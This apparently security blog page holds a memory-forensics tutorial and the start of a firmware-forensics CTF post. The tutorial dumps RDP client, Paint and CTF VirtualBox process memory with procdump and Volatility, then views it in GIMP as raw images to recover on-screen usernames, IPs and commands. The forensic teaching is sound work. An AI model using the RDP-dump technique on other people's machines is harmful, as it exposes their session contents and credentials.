Earlier today, while reading my Twitter timeline, I saw some Infosec folks discussing about scripts/tools to identify RAW pictures in memory dumps. I decided, then, to write this blog post and share a small hack that I use to visualize data (including memory dumps).<br />
<span style="text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://twitter.com/angealbertini/status/570495262474416130"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbl05-n0_xOnPK8a2CzumEn5b4zVHlbg9h4B4NS3cSa4PsY9LWwk9CV4jTIiKSPJTroLPQbiqj-rz3Td4cR-ycSrPV4Iq5UJ0HC5Atr8HeomSLDVXFM0_FyiZe0rLKu40wP39rErmmj6L8/s1600/ange.PNG" height="217" width="400" /></a></div>
<span style="text-align: center;"><br /></span>
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">A few months ago, I wrote a post detailing how to </span><a href="http://w00tsec.blogspot.com/2014/08/scan-internet-screenshot-all-things.html" style="text-align: center;">Scan the Internet & Screenshot All the Things</a><span style="text-align: center;">, now it's time to Dump the Memory & Screenshot All the Things.</span><br />
<b style="text-align: center;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivDgwAnem_1gyADGDI3kQ39ONt8nbWwcTRP6kdEeOEbNOLFVrppnGBThfUUH-Cy-glumknW8pqCf89KDSjZzIwJ6OpOCOLRM12dAeXdxmvgNQ8w9FHfYr4AWO7BO7D4cX2DN-u8VdtaMPt/s1600/memfor.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivDgwAnem_1gyADGDI3kQ39ONt8nbWwcTRP6kdEeOEbNOLFVrppnGBThfUUH-Cy-glumknW8pqCf89KDSjZzIwJ6OpOCOLRM12dAeXdxmvgNQ8w9FHfYr4AWO7BO7D4cX2DN-u8VdtaMPt/s1600/memfor.jpg" height="239" width="320" /></a></div>
<b style="text-align: center;"><br /></b>
<b style="text-align: center;"><br /></b>
<b style="text-align: center;">Memory Dumps</b><br />
<br />
The first thing you will want to do is to narrow the analysis to the process containing interesting images/pictures. I'm going to use three different memory dumps here:<br />
<br />
<b>Remote Desktop Client - Windows 7 x64 (mstsc.exe)</b><br />
<br />
Let's use the Windows built-in RDP client to connect to an external server and dump the process<br />
memory using <a href="https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx">procdump</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG1DsLAu3lhIMxIssgjj30YboNiMyyKLqJtyc11RwOedbQnRJKEcnfenxkIYJlpmdxiRHFzzeWoTkcdMT3zkWnfnyUCaJYLBsjtrQSjruTKx8FMdkZmlZGWeRRErOvvEHBtDBUNhu98OQ4/s1600/rdp1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG1DsLAu3lhIMxIssgjj30YboNiMyyKLqJtyc11RwOedbQnRJKEcnfenxkIYJlpmdxiRHFzzeWoTkcdMT3zkWnfnyUCaJYLBsjtrQSjruTKx8FMdkZmlZGWeRRErOvvEHBtDBUNhu98OQ4/s1600/rdp1.PNG" height="240" width="320" /></a></div>
<br />
<div class="code">
procdump.exe -ma mstsc.exe mstsc.dmp</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi_0MY48muzpS9zGzEwBloxSb6UrA3jW9jfTT8vi-PaCpyfye_w0Df_AfOE1Y86xMlGXRw2hMPtMZRMJ7rbmyxWqgt8DEQkHe6D_io7EWNb_-WCVmH-eMb1KMzaeRuPrg67gSs9E_x2eC-/s1600/rdp2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi_0MY48muzpS9zGzEwBloxSb6UrA3jW9jfTT8vi-PaCpyfye_w0Df_AfOE1Y86xMlGXRw2hMPtMZRMJ7rbmyxWqgt8DEQkHe6D_io7EWNb_-WCVmH-eMb1KMzaeRuPrg67gSs9E_x2eC-/s1600/rdp2.PNG" height="201" width="400" /></a></div>
<br />
<br />
<b>Microsoft Paint - Windows 7 x64 (mspaint.exe)</b><br />
<ul>
</ul>
<br />
Let's load/save a simple image file on Paint and run procdump again:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgg_s2LI_WdwDOm9MMlYSSBisY5z9cZOy6OmNZwQXC0awZZm-XfoFPi3NKj_a4ufK2oN8PIUHmZLV3MnUokhyphenhyphen-4ADMGz9qiXzLxOTmRQdZErQ-i1rsWzxxkhRLPb8HzK8e3_XONAB_kP52j/s1600/paint1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgg_s2LI_WdwDOm9MMlYSSBisY5z9cZOy6OmNZwQXC0awZZm-XfoFPi3NKj_a4ufK2oN8PIUHmZLV3MnUokhyphenhyphen-4ADMGz9qiXzLxOTmRQdZErQ-i1rsWzxxkhRLPb8HzK8e3_XONAB_kP52j/s1600/paint1.PNG" height="280" width="320" /></a></div>
<br />
<div class="code">
procdump.exe -ma mspaint.exe mspaint.dmp</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-_vEp3r2zVyxXopbguXFn_I8iLyxHHZi0H-23zKoRufeNiUKqfV6xJH3tBEPlL1CgeWrwd2cdud8Ribp2sY5VOojOkorGL1sWm952RUS7PLDANREe0zJWdx-dUtKAk1JUA3Jb9dHygLpb/s1600/mspaint2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-_vEp3r2zVyxXopbguXFn_I8iLyxHHZi0H-23zKoRufeNiUKqfV6xJH3tBEPlL1CgeWrwd2cdud8Ribp2sY5VOojOkorGL1sWm952RUS7PLDANREe0zJWdx-dUtKAk1JUA3Jb9dHygLpb/s1600/mspaint2.PNG" height="201" width="400" /></a></div>
<br />
<br />
<b>9447 2014 CTF Challenge: coor coor - Windows XP (VirtualBox.exe)</b><br />
<ul>
</ul>
<div>
There's an <a href="https://twitter.com/jstnkndy/status/541104077086928898">awesome write-up</a> for this CTF challenge <a href="http://w00tsec.blogspot.com/2014/11/9447-2014-ctf-write-up-coor-coor.html">here</a>, go read it now if you haven't yet. We are going to use volatility to isolate the VirtualBox memory dump:</div>
<div>
<br /></div>
<div>
<div class="code">
python vol.py -f challenge.vmem pslist</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZEhlaisCNtKzSxsVCvuNdWR6ORSjlZugsjArIQk-DhZ6jetG0oKpKsdslkqV1UO1RFUNCs0atr6GOEXbZrm9qXlsQzoBPQfHrQlZJjpBJVgjk8wxR0xlev1WmWK2bQduRTW5C-lafilKL/s1600/001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZEhlaisCNtKzSxsVCvuNdWR6ORSjlZugsjArIQk-DhZ6jetG0oKpKsdslkqV1UO1RFUNCs0atr6GOEXbZrm9qXlsQzoBPQfHrQlZJjpBJVgjk8wxR0xlev1WmWK2bQduRTW5C-lafilKL/s1600/001.png" height="268" width="400" /></a></div>
<br />
<div class="code">
python vol.py -f challenge.vmem memdump -p 1568 --dump-dir=dump/</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhduE964vwggWaB1tbvggjHwaDM25KBYbDlOgZjSwUvqzPIQuOaqm_5u0WEhwyjcvh2Lz_yir1ZIuPa8Dd3VGPQ36UTOl3yVK73ZsfZ3EAFLaAA-adf5z_UTRO1-sOwRyd5c-ExhxKYJWxC/s1600/002.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhduE964vwggWaB1tbvggjHwaDM25KBYbDlOgZjSwUvqzPIQuOaqm_5u0WEhwyjcvh2Lz_yir1ZIuPa8Dd3VGPQ36UTOl3yVK73ZsfZ3EAFLaAA-adf5z_UTRO1-sOwRyd5c-ExhxKYJWxC/s1600/002.png" height="78" width="400" /></a></div>
<br />
<br />
<b>RAW Image Data</b><br />
<br />
Rename the file extensions from *.dmp to *.data, download/install <a href="http://www.gimp.org/">GIMP</a> and open them as "RAW Image Data":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGt6ByT9hs1Sy8oMYNyZnBWVHlbpFLSX5ZZyBkOlP4iO61-rtmNbyZTFjB5OYMWuthFXJwuz46sAb0Fh1aN3hnzHY-cW4iRMBzvPPdIZsq0R2mZxYYP4AsZ-tx4Xp4MKbWF8zSeMwLRP6G/s1600/gimp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGt6ByT9hs1Sy8oMYNyZnBWVHlbpFLSX5ZZyBkOlP4iO61-rtmNbyZTFjB5OYMWuthFXJwuz46sAb0Fh1aN3hnzHY-cW4iRMBzvPPdIZsq0R2mZxYYP4AsZ-tx4Xp4MKbWF8zSeMwLRP6G/s1600/gimp1.png" height="201" width="320" /></a></div>
<br />
That's it, now you can use GIMP to navigate within the memory dump and analyse the rendered pixels/bitmaps on their corresponding offsets. It's worth mentioning that different images will be rendered using different Image types and variable widths: you may need to adjust these values accordingly.<br />
<br />
So what can we spot here?<br />
<br />
<ul>
<li>On the RDP memory dump, we can retrieve the tiles and Windows displayed during the connection, including IP's, usernames and commands:</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpP-ruDRCDOWQF76dmGIvs2kY65HlKBwr2wYqL2KOlATwo5MJpvy_aNWT6gcGZwK7BhzJ5WTWSuo9YkiDhzdhNFvDjZsfO_qWf4hF5OQaQ_zC5ZSpT1cPDGdneAvX92o8rWopOQ1Y-hxiU/s1600/Screenshot-Load+Image+from+Raw+Data-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpP-ruDRCDOWQF76dmGIvs2kY65HlKBwr2wYqL2KOlATwo5MJpvy_aNWT6gcGZwK7BhzJ5WTWSuo9YkiDhzdhNFvDjZsfO_qWf4hF5OQaQ_zC5ZSpT1cPDGdneAvX92o8rWopOQ1Y-hxiU/s1600/Screenshot-Load+Image+from+Raw+Data-2.png" height="320" width="306" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Windows commands</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipR0FPs8Ft-QDmjPxK5z18U8yLjz0f_1daSdvOy93_G5iqPjn59mqKrXm3FrUGoyW_09Ww_G1AfGQI7xkIlS2zCvHcnOZTJ5bBPblNaBWnfmXtPYSC_ufVzq0TpDjuOCdT66mNlbGJfs6z/s1600/Screenshot-Load+Image+from+Raw+Data-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipR0FPs8Ft-QDmjPxK5z18U8yLjz0f_1daSdvOy93_G5iqPjn59mqKrXm3FrUGoyW_09Ww_G1AfGQI7xkIlS2zCvHcnOZTJ5bBPblNaBWnfmXtPYSC_ufVzq0TpDjuOCdT66mNlbGJfs6z/s1600/Screenshot-Load+Image+from+Raw+Data-1.png" height="320" width="306" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Remote Desktop Client Window</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM71u75NnpHLI1tciywPKawKXDQdpL3ESO-J19x829mzDeXNX0U4h1hVGsSi98H8OV5_-AmqbqM2j2IQayaMEwMfiRqzaDxoDGx63wm1gRe4omiq47u3utrAR1XcZoe8aGwcehG_T9hr1Y/s1600/Screenshot-Load+Image+from+Raw+Data.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM71u75NnpHLI1tciywPKawKXDQdpL3ESO-J19x829mzDeXNX0U4h1hVGsSi98H8OV5_-AmqbqM2j2IQayaMEwMfiRqzaDxoDGx63wm1gRe4omiq47u3utrAR1XcZoe8aGwcehG_T9hr1Y/s1600/Screenshot-Load+Image+from+Raw+Data.png" height="320" width="306" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">RDP session</td></tr>
</tbody></table>
<div>
<ul>
<li>The Microsoft Paint picture can be easily spotted: they're upside down because that's the way BMP's are stored:</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSjJrwC2gro6zKTWtWUZ9-Ug2ros0p_HECzPAyC0ptqe0ZsKs8JANT3JMvDPNKhfPo4cKU2ZUG3_7xkvNibVn5Nhudc-uKXl7JU_xfcypUVL9WzHJVMikOoD5S56NnyOsaqKjk3wpTSXg/s1600/mspaint3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSjJrwC2gro6zKTWtWUZ9-Ug2ros0p_HECzPAyC0ptqe0ZsKs8JANT3JMvDPNKhfPo4cKU2ZUG3_7xkvNibVn5Nhudc-uKXl7JU_xfcypUVL9WzHJVMikOoD5S56NnyOsaqKjk3wpTSXg/s1600/mspaint3.PNG" height="260" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">We need upside down backdoors "this big"<br />
<br /></td></tr>
</tbody></table>
</div>
<ul>
<li>The most interesting artifacts were collected from the <a href="https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2">Coor Coor dump</a>. The user was running a TrueCrypt container inside VirtualBox and after some offset adjustment we can see the Pidgin Window, the user account (testicool69@yodawg.9447.plumbing) and a few OTR settings:</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2jmn7whwMgLZ3ju6tRYf3ypviTYDwiJD2Ratp-gIzykp_KFjyGpFFt-Kg_kxMyl4yn7gpW4CzDaTvAFmxpw2Li5S0glhV3oQDCns6eW1JRFfn6-8PBEg5xLdJILvYcwwB0UsgQrOBl1SV/s1600/Capturar.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2jmn7whwMgLZ3ju6tRYf3ypviTYDwiJD2Ratp-gIzykp_KFjyGpFFt-Kg_kxMyl4yn7gpW4CzDaTvAFmxpw2Li5S0glhV3oQDCns6eW1JRFfn6-8PBEg5xLdJILvYcwwB0UsgQrOBl1SV/s1600/Capturar.PNG" height="174" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">While True: width ++ || width--</td></tr>
</tbody></table>
<br />
Notice that the Windows are not perfectly aligned here, but we can see the data by zooming in:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3IwARn15E58jP0UDYX1c8vnjNw-XCDxUDPKHmBcAfKOCR57S_N56CvBIfDuUe3lN_rReEs9nePaqnsJJXvGffKmdY5p-PujjfGwmRMdvZR7pbIjibR7lS_-Gm-hkStXpLajlKj5G3cvVS/s1600/2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3IwARn15E58jP0UDYX1c8vnjNw-XCDxUDPKHmBcAfKOCR57S_N56CvBIfDuUe3lN_rReEs9nePaqnsJJXvGffKmdY5p-PujjfGwmRMdvZR7pbIjibR7lS_-Gm-hkStXpLajlKj5G3cvVS/s1600/2.PNG" height="347" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Enhance pls</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjrZ6QhZdtI2nrruDAEJI3cRXHkdpbOgh7I45z0ja7wti4Gfewb_8EgzqNMAzvmpx096z-mPJBGLXTg0dv7-PD0z1qaveUX-Sm1xWT4jRiLpZjOJQRvfOvFKX_pwHb-olflxFKf3n73k3U/s1600/zoom.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjrZ6QhZdtI2nrruDAEJI3cRXHkdpbOgh7I45z0ja7wti4Gfewb_8EgzqNMAzvmpx096z-mPJBGLXTg0dv7-PD0z1qaveUX-Sm1xWT4jRiLpZjOJQRvfOvFKX_pwHb-olflxFKf3n73k3U/s1600/zoom.PNG" height="266" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://hsto.org/storage2/b52/91b/ba7/b5291bba7250abd12010644ca848dd75.jpg">Looks like our killer is screwed. YEEAAAH.</a></td></tr>
</tbody></table>
<br />
We can also spot the Window taskbar, just like the volatility <a href="https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference%20Gui#screenshot">screenshot plugin</a> showed us on the <a href="http://w00tsec.blogspot.com/2014/11/9447-2014-ctf-write-up-coor-coor.html">previous write-up</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwEn5BURxFPVXJml5v0kPA-o_YqM7_kolYTD4ob4OAjGEMws2hUmIfDHF9cJiiFga_zBAQWCArV9SGSECq5s4gXg9FB3XAftiQYkUwRXy_eNGZMxl564gRV8c8bxrpgt5Syp4yJ1qCmoHD/s1600/window.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwEn5BURxFPVXJml5v0kPA-o_YqM7_kolYTD4ob4OAjGEMws2hUmIfDHF9cJiiFga_zBAQWCArV9SGSECq5s4gXg9FB3XAftiQYkUwRXy_eNGZMxl564gRV8c8bxrpgt5Syp4yJ1qCmoHD/s1600/window.PNG" height="425" width="640" /></a></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhalYKauMfz_kCDmjFiJxa87FCcw3sL23YfbCEBjhN0Lq2RSrnt3AmKq6Hs1YxvGGFmBTsutbI52o7mYVMA22aa5QsO1ocx_cMcdcVK6bzqTRHV1FwsCuox9jwkVo2EDS_R5VSJQD8rDV6y/s1600/session_0.WinSta0.Default.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhalYKauMfz_kCDmjFiJxa87FCcw3sL23YfbCEBjhN0Lq2RSrnt3AmKq6Hs1YxvGGFmBTsutbI52o7mYVMA22aa5QsO1ocx_cMcdcVK6bzqTRHV1FwsCuox9jwkVo2EDS_R5VSJQD8rDV6y/s1600/session_0.WinSta0.Default.png" height="227" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">python vol.py -f challenge.vmem screenshot -D screenshot/</td></tr>
</tbody></table>
<br />
It's also possible to spot icons from the running programs, like this one from Virtualbox:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj49hjqhBLw6ozl8lqq_C481EDL5XKUVb3bJHHKh2AQ7N1QJ_jXevHxWmWiR_wq1zONk6RiQNS4KFdN9YcVMtDlHOzJ0lWepDUqfYo0zIRdDMfGr7XvHwkJGTgI9puAXm0rwPMtJOmbZYYi/s1600/vbox.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj49hjqhBLw6ozl8lqq_C481EDL5XKUVb3bJHHKh2AQ7N1QJ_jXevHxWmWiR_wq1zONk6RiQNS4KFdN9YcVMtDlHOzJ0lWepDUqfYo0zIRdDMfGr7XvHwkJGTgI9puAXm0rwPMtJOmbZYYi/s1600/vbox.PNG" height="266" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">VirtualBox <a href="http://www.eightforums.com/attachments/virtualization/6578d1339062148t-vbox-ose-windows-xp-vista-7-8-64-bit-virtualbox.png">icon</a></td></tr>
</tbody></table>
<br />
<br />
<b>Conclusion</b><br />
<br />
This technique is very common among ROM hackers as they try to find image patterns inside raw game dumps. Check my <a href="http://w00tsec.blogspot.com/2014/10/hacklu-2014-ctf-write-up-at-gunpoint.html">write-up from Hack.lu 2014 CTF</a> to find more about it. By the way, you can also use <a href="http://www.romhacking.net/utilities/991/">Tile Molester</a> instead of GIMP to browse the RAW data.<br />
<div>
<br /></div>
You may be asking - why not carve the dumps using binwalk and foremost or extract them using the <a href="https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference#dumpfiles">dumpfiles</a> volatility module? If you try it yourself you will notice that they won't find the magic bytes for all those images.<br />
<br />
As far as I know, there's no off-the-shelf tool to automagically extract them, but it should't be that hard to write a binwalk/volatility plugin for this based on some heuristics. Binwalk, for example, can find <a href="https://github.com/devttys0/binwalk/blob/b131b7cda7d067897901a5a29dc0cdb8ca69efcb/src/binwalk/modules/compression.py">raw deflate/lzma</a> streams by building headers on top of the raw compressed data and writing it back do disk.<br />
<br />
I'm no Computer Visualization expert, but here's a few suggestions:<br />
<br />
<ul>
<li>Set the image width to common display resolutions. The taskbar from the coor coor memory dump could be displayed by setting the width to 1440 points (1440x900 is a common screen resolution).</li>
<li>Use common window background/patterns as a template to find interesting sections.</li>
<li>Create a multi-view/side-by-side RAW image browser based on <a href="https://github.com/GNOME/gimp/blob/cd99314572504bcbcbc9b82035e45fcd95d7d9d5/plug-ins/common/file-raw-data.c">GIMP source code</a> (multiple image types, multiple widths etc).</li>
<li>Use Google's artificial brain to <a href="http://www.wired.com/2012/06/google-x-neural-network/">find cat videos</a>.</li>
<li>Get a bigger monitor (yeah, it helps).</li>
</ul>
<br />
I hope you all use these skills wisely, avoiding any kind of superfishal investigation like our Lenovo friends.<br />
<br />
<a href="https://imgur.com/V4zfOZX"><img height="400" src="https://i.imgur.com/V4zfOZX.png" width="640" /></a><br />
<br />
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com9tag:blogger.com,1999:blog-3296471108082693838.post-15976814769181824682015-02-09T11:49:00.000-02:002015-05-04T23:57:38.187-03:00Firmware Forensics: Diffs, Timelines, ELFs and BackdoorsThis post covers some common techniques that I use to analyze and reverse firmware images. These techniques are particularly useful to dissect malicious firmwares, spot backdoors and detect unwanted modifications.<br />
<br />
Backdooring and re-flashing firmware images is becoming mainstream: malicious guys are infecting embedded devices and inserting trojans in order to achieve persistence. Recent articles covered the increasing number of <a href="http://www.net-security.org/malware_news.php?id=2917">trojanized android firmwares</a> and <a href="http://securelist.com/blog/research/67794/state-of-play-network-devices-facing-bulls-eye/">routers that are being permanently modified</a>.<br />
<br />
Attackers with a privileged network position may MITM your requests and forge fake updates containing malicious firmwares. Writing <a href="https://github.com/infobyte/evilgrade">Evilgrade</a> modules for this is really simple, as most vendors keep <a href="http://dnlongen.blogspot.com.br/2014/10/CVE-2014-2718-Asus-RT-MITM.html">failing to deliver updates securely</a>, right <a href="http://w00tsec.blogspot.com/2014/07/hacking-asus-rt-ac66u-and-preparing-for.html">ASUS</a>?<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWVAqfAxq9i11xwch4_2rLEoiMNZY7fSYfaS2_duBjnX8T947BO6-H4MPn3FevI5TkqWoPyOjjHwzm9cIaK_f8e0tmfSEH2miFfrOmv67AgVG2cXh9PvbIfrCZszkkZPzPbpPPtOpqE0HL/s1600/22.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWVAqfAxq9i11xwch4_2rLEoiMNZY7fSYfaS2_duBjnX8T947BO6-H4MPn3FevI5TkqWoPyOjjHwzm9cIaK_f8e0tmfSEH2miFfrOmv67AgVG2cXh9PvbIfrCZszkkZPzPbpPPtOpqE0HL/s1600/22.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">All your HTTP packets are belong to us...</td></tr>
</tbody></table>
Older versions of ASUS firmwares were vulnerable to MITM attacks (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2718">CVE-2014-2718</a>) because it transmitted updates over HTTP and there were no security/signature checks. ASUS silently patched the issue on 3.0.0.4.376+ and they're now <a href="https://github.com/RMerl/asuswrt-merlin/blob/042f83715c5951e291a83ce7d967c3372a392a26/release/src/router/rom/webs_scripts/nozip_webs_upgrade.sh#L75-L96">verifying RSA signatures</a> via /sbin/rsasign_check.:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC0cQu1acgVo7UTo6YKDgezjhpdsSYNqWMNhEHp9nQYVpSGxVWLxSymHUgSDgLC3IKiqoUK8Q3Bhpx4-oBqBc3oC86RGsCPeueg1Vw67b5pk9Uxxn1XlQBsg4ymmCNP0yu-TdZHgaRte3e/s1600/asus_rsa.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC0cQu1acgVo7UTo6YKDgezjhpdsSYNqWMNhEHp9nQYVpSGxVWLxSymHUgSDgLC3IKiqoUK8Q3Bhpx4-oBqBc3oC86RGsCPeueg1Vw67b5pk9Uxxn1XlQBsg4ymmCNP0yu-TdZHgaRte3e/s1600/asus_rsa.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Valid signature -> nvram_set("rsasign_check", "1")</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<b>NoConName 2014 CTF Finals: Vodka</b><br />
<br />
I'll keep my <a href="http://w00tsec.blogspot.com/2014/07/hacking-asus-rt-ac66u-and-preparing-for.html">tradition</a> of writing posts based on CTF challenges because <strike>everybody upvotes CTF posts on reddit</strike> it's cool.<br />
<br />
The challenge "<a href="https://github.com/MarioVilas/write-ups/tree/master/ncn-ctf-2014/Vodka">Vodka</a>", from <a href="https://twitter.com/noconname">NoConName 2014</a> CTF Finals was created by <a href="https://twitter.com/MarioVilas">@MarioVilas</a>, who kindly provided the files <a href="https://github.com/MarioVilas/write-ups/tree/master/ncn-ctf-2014/Vodka">here</a> (thanks dude!).<br />
<br />
I did not participate on the CTF finals, but I found the challenge really interesting because there were many different ways to solve it, summarizing the actions needed to audit a compromised firmware. In my opinion, the best CTF challenges are the ones that require us to <a href="https://github.com/ctfs/write-ups/tree/master/hack-lu-ctf-2014/hotcows-dating">develop/use new techniques</a> and <a href="https://twitter.com/cherepanov74/status/525617612559249408">improve existing tools</a>.<br />
<br />
NoConName 2014 Finals: Vodka<br />
Challenge Category: Forensics<br />
Description: No hints :( just get the flag.
<br />
<br />
This challenge description is not very intriguing, so I hired a couple of marketing specialists to <strike>design a new logo</strike> add some Infosec drama and reformulate it:<br />
<br />
<div class="code">
A mysterious bug affected one of the core routers at a major Internet service provider in Syria. The failure of this router caused the whole country to suddenly lose all connection to the Internet. The Syrian government recorded a traffic capture right before the crash and hired you to perform a forensic analysis.</div>
<br />
